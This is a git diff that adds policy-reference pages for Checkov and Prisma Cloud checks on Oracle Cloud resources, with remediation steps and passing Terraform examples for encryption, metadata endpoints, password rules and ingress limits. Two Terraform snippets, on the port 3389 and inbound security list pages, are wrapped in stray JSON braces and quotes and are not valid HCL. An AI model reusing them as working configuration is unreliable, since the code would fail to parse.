+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py[CKV_OCI_4]
+|HIGH
+
+
+|xref:ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc[OCI Compute Instance has Legacy MetaData service endpoint enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py[CKV_OCI_5]
+|HIGH
+
+
+|===
+
diff --git a/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc
new file mode 100644
index 000000000..411fa30ce
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc
@@ -0,0 +1,93 @@
+== OCI Compute Instance boot volume has in-transit data encryption disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 85e6e5a1-79e8-40ce-8d38-274b05168666
+
+|Checkov Check ID
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py[CKV_OCI_4]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies OCI Compute Instances whose boot or block volumes have in-transit data encryption disabled.
+It is recommended that Compute Instance boot or block volumes be configured with in-transit data encryption to minimize the risk of sensitive data being leaked.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console.
+
+. Type the resource reported in the alert into the Search box at the top of the Console.
+
+. Click the resource reported in the alert from the Resources submenu.
+
+. Click Edit.
+
+. Click Show Advanced Options.
+
+. Select USE IN-TRANSIT ENCRYPTION.
+
+. Click Save Changes. Note: To update the instance properties, the instance must be rebooted.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_core_instance
+* *Arguments:* is_pv_encryption_in_transit_enabled
+
+
+[source,go]
+----
+resource "oci_core_instance" "pass" {
+  ...
+
+  ipxe_script                         = var.instance_ipxe_script
+  is_pv_encryption_in_transit_enabled = var.instance_is_pv_encryption_in_transit_enabled
+
+  launch_options {
+    boot_volume_type                    = var.instance_launch_options_boot_volume_type
+    firmware                            = var.instance_launch_options_firmware
+    is_consistent_volume_naming_enabled = var.instance_launch_options_is_consistent_volume_naming_enabled
+    is_pv_encryption_in_transit_enabled = true
+    network_type                        = var.instance_launch_options_network_type
+    remote_data_volume_type             = var.instance_launch_options_remote_data_volume_type
+  }
+
+  ...
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc
new file mode 100644
index 000000000..f4eaad419
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/compute/ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc
@@ -0,0 +1,89 @@
+== OCI Compute Instance has Legacy MetaData service endpoint enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a38a8110-054c-4a3b-af99-5e452e564e54
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py[CKV_OCI_5]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies OCI Compute Instances that have the Legacy MetaData service (IMDSv1) endpoint enabled.
+It is recommended that Compute Instances have the legacy v1 endpoint (Instance Metadata Service v1) disabled and use Instance Metadata Service v2 instead, following security best practices.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console.
+
+. Type the resource reported in the alert into the Search box at the top of the Console.
+
+. Click the resource reported in the alert from the Resources submenu.
+
+. In the Instance Details section, next to Instance Metadata Service, click Edit.
+
+. For the Allowed IMDS version, select the Version 2 only option.
+
+. Click Save Changes.
++
+Note: If you disable IMDSv1 on an instance that does not support IMDSv2, you might not be able to connect to the instance when you launch it.
++
+To re-enable IMDSv1 using the Console: on the Instance Details page, next to Instance Metadata Service, click Edit.
++
+Select the Version 1 and version 2 option, save your changes, and then restart the instance.
++
+Using the API, use the UpdateInstance operation.
++
+For more information: https://docs.cloud.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm#upgrading-v2
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_core_instance
+* *Arguments:* instance_options.are_legacy_imds_endpoints_disabled
+
+
+[source,go]
+----
+resource "oci_core_instance" "pass" {
+  ...
+  instance_options {
+    are_legacy_imds_endpoints_disabled = true
+  }
+  ...
+}
+----
diff --git a/code-security/policy-reference/oci-policies/iam/iam.adoc b/code-security/policy-reference/oci-policies/iam/iam.adoc
new file mode 100644
index 000000000..073affeeb
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/iam/iam.adoc
@@ -0,0 +1,34 @@
+== IAM
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc[OCI IAM password policy for local (non-federated) users does not have a minimum length of 14 characters]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordLength.py[CKV_OCI_18]
+|HIGH
+
+
+|xref:oci-iam-password-policy-must-contain-lower-case.adoc[OCI IAM password policy for local (non-federated) users does not have a lowercase character]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py[CKV_OCI_11]
+|HIGH
+
+
+|xref:oci-iam-password-policy-must-contain-numeric-characters.adoc[OCI IAM password policy for local (non-federated) users does not have a number]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py[CKV_OCI_12]
+|HIGH
+
+
+|xref:oci-iam-password-policy-must-contain-special-characters.adoc[OCI IAM password policy for local (non-federated) users does not have a symbol]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py[CKV_OCI_13]
+|HIGH
+
+
+|xref:oci-iam-password-policy-must-contain-uppercase-characters.adoc[OCI IAM password policy for local (non-federated) users does not have an uppercase character]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py[CKV_OCI_14]
+|HIGH
+
+
+|===
+
diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc
new file mode 100644
index 000000000..69a1da686
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc
@@ -0,0 +1,81 @@
+== OCI IAM password policy for local (non-federated) users does not have a minimum length of 14 characters
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| dee1d98b-0a20-467b-8f2e-a33d79717d04
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordLength.py[CKV_OCI_18]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Oracle Cloud Infrastructure (OCI) accounts that do not enforce a minimum password length of 14 characters for local (non-federated) users.
+As a security best practice, configure a strong password policy for secure access to the OCI console.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. 
Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/
+
+. Go to Identity in the Services menu.
+
+. Select Authentication Settings from the Identity menu.
+
+. Click Edit Authentication Settings in the middle of the page.
+
+. Type a number in the range 14-100 into the box below the text: MINIMUM PASSWORD LENGTH (IN CHARACTERS).
++
+Note: The console URL is region-specific; your tenancy might have a different home region and thus a different console URL.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_identity_authentication_policy
+* *Arguments:* password_policy.minimum_password_length
+
+
+[source,go]
+----
+resource "oci_identity_authentication_policy" "pass" {
+
+  compartment_id = var.tenancy_id
+
+  password_policy {
+    ...
+    minimum_password_length = 14
+  }
+
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-lower-case.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-lower-case.adoc
new file mode 100644
index 000000000..4446dd3b3
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-lower-case.adoc
@@ -0,0 +1,80 @@
+== OCI IAM password policy for local (non-federated) users does not have a lowercase character
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 31f6c364-9023-4bf1-8679-f31cd660a18d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py[CKV_OCI_11]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Oracle Cloud Infrastructure (OCI) accounts that do not require a lowercase character in the password policy for local (non-federated) users.
+As a security best practice, configure a strong password policy for secure access to the OCI console.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/
+
+. Go to Identity in the Services menu.
+
+. Select Authentication Settings from the Identity menu.
+
+. Click Edit Authentication Settings in the middle of the page.
+
+. Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 LOWERCASE CHARACTER.
++
+Note: The console URL is region-specific; your tenancy might have a different home region and thus a different console URL.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_identity_authentication_policy
+* *Arguments:* password_policy.is_lowercase_characters_required
+
+
+[source,go]
+----
+resource "oci_identity_authentication_policy" "pass" {
+  ...
+
+  password_policy {
+    is_lowercase_characters_required = true
+    ...
+  }
+
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-numeric-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-numeric-characters.adoc
new file mode 100644
index 000000000..c5648884c
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-numeric-characters.adoc
@@ -0,0 +1,80 @@
+== OCI IAM password policy for local (non-federated) users does not have a number
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 32e382d2-6925-47d7-a6ff-5310153cf8d7
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py[CKV_OCI_12]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Oracle Cloud Infrastructure (OCI) accounts that do not require a number in the password policy for local (non-federated) users.
+As a security best practice, configure a strong password policy for secure access to the OCI console.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/
+
+. Go to Identity in the Services menu.
+
+. Select Authentication Settings from the Identity menu.
+
+. Click Edit Authentication Settings in the middle of the page.
+
+. Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 NUMERIC CHARACTER.
++
+Note: The console URL is region-specific; your tenancy might have a different home region and thus a different console URL.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_identity_authentication_policy
+* *Arguments:* password_policy.is_numeric_characters_required
+
+
+[source,go]
+----
+resource "oci_identity_authentication_policy" "pass" {
+  ...
+  password_policy {
+    ...
+    is_numeric_characters_required = true
+    ...
+  }
+
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-special-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-special-characters.adoc
new file mode 100644
index 000000000..d41d0311d
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-special-characters.adoc
@@ -0,0 +1,82 @@
+== OCI IAM password policy for local (non-federated) users does not have a symbol
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| fd39d77b-3d8b-4a35-9764-fc9ffcd7959d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py[CKV_OCI_13]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Oracle Cloud Infrastructure (OCI) accounts that do not require a symbol in the password policy
for local (non-federated) users.
+As a security best practice, configure a strong password policy for secure access to the OCI console.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/
+
+. Go to Identity in the Services menu.
+
+. Select Authentication Settings from the Identity menu.
+
+. Click Edit Authentication Settings in the middle of the page.
+
+. Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 SPECIAL CHARACTER.
++
+Note: The console URL is region-specific; your tenancy might have a different home region and thus a different console URL.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_identity_authentication_policy
+* *Arguments:* password_policy.is_special_characters_required
+
+
+[source,go]
+----
+resource "oci_identity_authentication_policy" "pass" {
+
+  compartment_id = var.tenancy_id
+
+  password_policy {
+    ...
+    is_special_characters_required = true
+    ...
+  }
+
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-uppercase-characters.adoc b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-uppercase-characters.adoc
new file mode 100644
index 000000000..11a033c04
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/iam/oci-iam-password-policy-must-contain-uppercase-characters.adoc
@@ -0,0 +1,80 @@
+== OCI IAM password policy for local (non-federated) users does not have an uppercase character
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3772cf24-3db1-46ac-8332-f04a02bb184e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py[CKV_OCI_14]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Oracle Cloud
Infrastructure (OCI) accounts that do not require an uppercase character in the password policy for local (non-federated) users.
+As a security best practice, configure a strong password policy for secure access to the OCI console.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console Page: https://console.ap-mumbai-1.oraclecloud.com/
+
+. Go to Identity in the Services menu.
+
+. Select Authentication Settings from the Identity menu.
+
+. Click Edit Authentication Settings in the middle of the page.
+
+. Ensure the checkbox is selected next to MUST CONTAIN AT LEAST 1 UPPERCASE CHARACTER.
++
+Note: The console URL is region-specific; your tenancy might have a different home region and thus a different console URL.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_identity_authentication_policy
+* *Arguments:* password_policy.is_uppercase_characters_required
+
+
+[source,go]
+----
+resource "oci_identity_authentication_policy" "pass" {
+  ...
+  password_policy {
+    ...
+    is_uppercase_characters_required = true
+    ...
+  }
+
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/logging/ensure-oci-compute-instance-has-monitoring-enabled.adoc b/code-security/policy-reference/oci-policies/logging/ensure-oci-compute-instance-has-monitoring-enabled.adoc
new file mode 100644
index 000000000..42b839884
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/logging/ensure-oci-compute-instance-has-monitoring-enabled.adoc
@@ -0,0 +1,81 @@
+== OCI Compute Instance has monitoring disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6750266c-3d25-408e-b6a1-18a181f12047
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py[CKV_OCI_6]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies OCI Compute Instances that are configured with monitoring disabled.
+It is recommended that Compute Instances be configured with monitoring enabled, following security best practices.
+
+////
+=== Fix - Runtime
+
+
+*OCI Console*
+
+
+
+. Login to the OCI Console.
+
+. Type the resource reported in the alert into the Search box at the top of the Console.
+
+. Click the resource reported in the alert from the Resources submenu.
+
+. Under Resources, click Metrics.
+
+. Click Enable monitoring.
++
+(If monitoring is not enabled and the instance uses a supported image, a button is available to enable monitoring.)
++
+For more information: https://docs.cloud.oracle.com/en-us/iaas/Content/Compute/Tasks/enablingmonitoring.htm#ExistingEnabling
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* oci_core_instance
+* *Arguments:* agent_config.is_monitoring_disabled
+
+
+[source,go]
+----
+resource "oci_core_instance" "pass" {
+  ...
+  agent_config {
+    ...
+    is_monitoring_disabled = false
+  }
+  ...
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/logging/logging.adoc b/code-security/policy-reference/oci-policies/logging/logging.adoc
new file mode 100644
index 000000000..5369aa847
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/logging/logging.adoc
@@ -0,0 +1,14 @@
+== Logging
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:ensure-oci-compute-instance-has-monitoring-enabled.adoc[OCI Compute Instance has monitoring disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py[CKV_OCI_6]
+|HIGH
+
+
+|===
+
diff --git a/code-security/policy-reference/oci-policies/networking/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc b/code-security/policy-reference/oci-policies/networking/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc
new file mode 100644
index 000000000..2cee3ea71
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/networking/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc
@@ -0,0 +1,63 @@
+== GCP VPC Network subnets have Private Google access disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ec842076-78f1-4c9c-86dc-e1c0e00f6150
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py[CKV_GCP_76]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Enabling Private Google Access for IPv6 can help improve the security of your Google Cloud Platform (GCP) resources by allowing them to access Google APIs and services over IPv6 networks, rather than over the public internet.
+This can help reduce the risk of your traffic being intercepted or tampered with, as it is routed through Google's private network.
+Additionally, Private Google Access can help improve the performance and reliability of your GCP resources by reducing network latency and eliminating the need to route traffic through third-party networks.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_compute_subnetwork" "pass_bidi" {
+  name             = "log-test-subnetwork"
+  ip_cidr_range    = "10.2.0.0/16"
+  stack_type       = "IPV4_IPV6"
+  ipv6_access_type = "EXTERNAL"
+  region           = "us-central1"
+  network          = google_compute_network.custom-test.id
+  # purpose = "INTERNAL_HTTPS_LOAD_BALANCER" is ignored if set
+  # log_config {
+  #   metadata = "EXCLUDE_ALL_METADATA"
+  # }
+  private_ip_google_access   = true
+  private_ipv6_google_access = "ENABLE_BIDIRECTIONAL_ACCESS_TO_GOOGLE"
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-group-has-stateless-ingress-security-rules.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-group-has-stateless-ingress-security-rules.adoc
new file mode 100644
index 000000000..f2c5d2919
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-group-has-stateless-ingress-security-rules.adoc
@@ -0,0 +1,32 @@
+== OCI Network Security Groups (NSGs) have stateful security rules
+
+
+=== Description
+
+Stateless rules for network security groups create one-way traffic rather than two-way.
+This makes it very explicit which ports are available internally and externally.
+This is recommended for high-volume websites.
+
+////
+=== Fix - Runtime
+
+. Go to Networking > Virtual Cloud Networks > VCN Name > Resources > Network Security Groups
+
+. Edit your Network Security Group
+
+. 
Under Security Rules, check "Stateless" for all rules.
+////
+
+=== Fix - Buildtime
+* *Resource:* oci_core_network_security_group_security_rule
+* *Arguments:* stateless
+
+[source,go]
+----
+resource "oci_core_network_security_group_security_rule" "pass" {
+  network_security_group_id = oci_core_network_security_group.test_network_security_group.id
+  direction                 = "INGRESS"
+  protocol                  = var.network_security_group_security_rule_protocol
+  stateless                 = true
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc
new file mode 100644
index 000000000..82dc36438
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc
@@ -0,0 +1,62 @@
+== OCI security group rules allow ingress from 0.0.0.0/0 to port 22
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1701ce20-d68f-47c1-a68e-fb42aeaecb60
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py[CKV_OCI_22]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Security groups are stateful and provide filtering of ingress/egress network traffic to OCI resources.
+We recommend that security groups do not allow unrestricted ingress access to port 22.
+Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "oci_core_network_security_group_security_rule" "pass" {
+  network_security_group_id = oci_core_network_security_group.sg.id
+  direction                 = "INGRESS"
+  protocol                  = "6"
+  # restrict SSH to a trusted CIDR instead of 0.0.0.0/0
+  source                    = "10.0.0.0/16"
+
+  tcp_options {
+    destination_port_range {
+      max = 22
+      min = 22
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc
new file mode 100644
index 000000000..9cba8df14
--- /dev/null
+++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc
@@ -0,0 +1,76 @@
+== OCI Security Lists with Unrestricted traffic to port 22
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a19da9e9-3959-446b-bbc8-6980354a028f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py[CKV_OCI_19]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Security lists are stateful and provide filtering of ingress/egress network traffic to OCI resources.
+We recommend that security lists do not allow unrestricted ingress access to port 22.
+Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk.
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "oci_core_security_list" "pass0" { + compartment_id = var.compartment_id + vcn_id = oci_core_vcn.test_vcn.id + + ingress_security_rules { + protocol = var.security_list_ingress_security_rules_protocol + source = "0.0.0.0/0" + + tcp_options { + max = 25 + min = 25 + source_port_range { + max = var.security_list_ingress_security_rules_tcp_options_source_port_range_max + min = var.security_list_ingress_security_rules_tcp_options_source_port_range_min + } + } + udp_options { + max = 21 + min = 20 + source_port_range { + max = var.security_list_ingress_security_rules_udp_options_source_port_range_max + min = var.security_list_ingress_security_rules_udp_options_source_port_range_min + } + } + } +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc new file mode 100644 index 000000000..f1598b2b2 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc @@ -0,0 +1,75 @@ +== OCI security list allows ingress from 0.0.0.0/0 to port 3389 + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 682880bd-f12b-4a81-90bb-b3d6d05fcd90 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py[CKV_OCI_20] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +This policy identifies security lists that allow inbound traffic on RDP port (3389) from the public internet.
+As a best practice, restrict security groups to only allow permitted traffic and limit brute force attacks on your network. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass0" { + compartment_id = "var.compartment_id" + vcn_id = "oci_core_vcn.test_vcn.id" + + ingress_security_rules { + protocol = "var.security_list_ingress_security_rules_protocol" + source = "0.0.0.0/0" + + tcp_options { + max = 4000 + min = 3390 + source_port_range { + max = "var.security_list_ingress_security_rules_tcp_options_source_port_range_max" + min = "var.security_list_ingress_security_rules_tcp_options_source_port_range_min" + } + + } + udp_options { + max = 21 + min = 20 + source_port_range { + max = "var.security_list_ingress_security_rules_udp_options_source_port_range_max" + min = "var.security_list_ingress_security_rules_udp_options_source_port_range_min" + } + + } + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-vcn-has-an-inbound-security-list.adoc b/code-security/policy-reference/oci-policies/networking/ensure-vcn-has-an-inbound-security-list.adoc new file mode 100644 index 000000000..7ed60a593 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-vcn-has-an-inbound-security-list.adoc @@ -0,0 +1,80 @@ +== OCI VCN has no inbound security list + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 713fe300-01ef-4981-a3e5-32cded00372d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngress.py[CKV_OCI_16] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Virtual Cloud Networks (VCN) that lack ingress rules configured in their security lists. 
+It is recommended that Virtual Cloud Networks (VCN) security lists are configured with ingress rules which provide stateful and stateless firewall capability to control network access to your instances. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on Ingress rules + +. Click on Add Ingress Rules (To add ingress rules appropriately in the pop up) + +. Click on Add Ingress Rules +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_security_list +* *Arguments:* vcn_id + ingress_security_rules + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass" { + compartment_id = oci_identity_compartment.tf-compartment.id + vcn_id = oci_core_vcn.test_vcn.id + ingress_security_rules { + protocol = "all" + source="192.168.1.0/24" + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-vcn-inbound-security-lists-are-stateless.adoc b/code-security/policy-reference/oci-policies/networking/ensure-vcn-inbound-security-lists-are-stateless.adoc new file mode 100644 index 000000000..0e6d86417 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-vcn-inbound-security-lists-are-stateless.adoc @@ -0,0 +1,82 @@ +== OCI VCN Security list has stateful security rules + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 54827b06-7c86-4886-85b6-3d984c6fddf4 + +|Checkov Check ID +| 